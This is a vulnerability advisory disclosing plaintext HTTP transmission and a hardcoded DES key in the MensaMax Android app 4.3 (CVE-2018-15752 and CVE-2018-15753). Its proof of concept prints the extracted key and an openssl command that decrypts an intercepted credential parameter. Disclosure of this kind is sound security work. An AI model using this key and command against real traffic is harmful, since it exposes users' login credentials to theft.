MensaMax 4.3 Hardcoded Encryption Key Disclosure

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
## e2 Security GmbH Advisory 2018-01 ##  
#######################################  
  
  
Unencrypted transmission and usage of hardcoded encryption key  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Overview  
########  
  
Advisory ID: E2SA-2018-01  
Advisory Version: 1.0  
Advisory Status: Public  
Advisory URL: https://advisories.e2security.de/2018/E2SA-2018-01.txt  
Affected Product: MensaMax Android app  
Affected Version: 4.3  
Vendor: Breustedt GmbH, https://mensamax.de  
Credits: Stefan Pietsch, e2 Security GmbH  
  
  
Issue Details  
#############  
  
1) The MensaMax Android application uses plain HTTP to communicate with the web  
server. Authentication information is transmitted in plain text with a HTTP GET  
request. An attacker is able to eavesdrop the communication between the  
application and the server because the transport layer is not encrypted.  
  
Severity: High  
CVSS Score: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)  
CVE ID: CVE-2018-15752  
CWE ID: CWE-319  
  
  
2) The MensaMax Android application encrypts the login username and password  
with a static DES key. The key is hardcoded in the Android application file. An  
attacker is able to retrieve the encryption key from the apk file and decrypt  
the login credentials retrieved from the unencrypted HTTP transmission.  
  
Severity: High  
CVSS Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)  
CVE ID: CVE-2018-15753  
CWE ID: CWE-321  
  
  
PoC (Proof of Concept)  
######################  
  
Sample HTTP request with invalid credentials:  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
GET /MM_Android/Service1.svc/getURLVonProjekt/GtBWTDhwry4=,s7eTGwGP_h0=,N9NkXQvJkIQ=,iDZZxd4IXZ0=,A3smkmlKRzw=,mensahome HTTP/1.1  
Host: mensahome.de  
Connection: close  
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
The GET parameters are Base64 encoded and encrypted with a static DES key.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
# echo "N9NkXQvJkIQ=" | openssl enc -a -des-ecb -d -K 436f666665653130  
user1  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Solution and Workaround  
#######################  
  
Do not use the MensaMax Android app until a fixed version is released.  
  
  
History  
#######  
  
2018-08-10: Issue found  
2018-08-13: Initial Vendor contact, Issue details reported to Vendor  
2018-08-15: Vendor acknowledged vulnerabilities  
2018-08-23: CVE IDs added  
2018-10-01: Advisory published  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEENetcDna8vCUjklqvmSVmYknuuOMFAluyLA0ACgkQmSVmYknu  
uOOHdQ//VFjBl+sOKkuCc/y4nH9MezI3wqMnsuk9rXgQpbdUjmZD+H9MO/Y3ylQN  
0QkdQ1MSkFFHazHQD+VHJSYm/Ps7ma4+zcKAhId5zuiBFYIM2fyh6pZSGtLLB+F1  
bYAWNTY45yPH/5EfeOUYd60pPPI57uic8fWLJPICnYvI5JW+1geE1I+ljNKrhSmf  
HCaU4JYXr19J8pZU2cVU2GWQ55CPOrIsgmGPoAbncnWguM/Seh2VL29kfy12sN3d  
fH70VvyZA6fBne/tKaueeYEBOYlZw0PAdBOBcktrOj19VK18xp2yE9W884F1n6fM  
N+EocPG2wj8irmagLvIKQZuSCbydxTC58W41WtKwSgA8LsvvOr2yZeqU+B59ouB4  
Ibn6TfXSScfFj4ohPiqaPNpakGHeoREyH5sg7ipiBeELT+JyRQRNnZIQ33LFAGfN  
8KkVrt6i0rkc0rXeIPLso6utng0Z52n7T3BJmny7XVqYb/YWocE0SWJ4V5TIqSw9  
B0M3jD6NyMqYIJSfmDBOyangEUU6Ww0c1C272tJ/Mt5YOYK9OFo/zBERdIWXm9I+  
f3yD3mauZK/oLQoVheWcqLy2ThsU5Vss6fbLobhY5EF08BaUlAIdp7ietVlbz3vQ  
G1yzvhgLfgWteP6nTwghyznkBqZbkC/gJ49G9/YZDpm25/inOtc=  
=7Jzx  
-----END PGP SIGNATURE-----  
  
`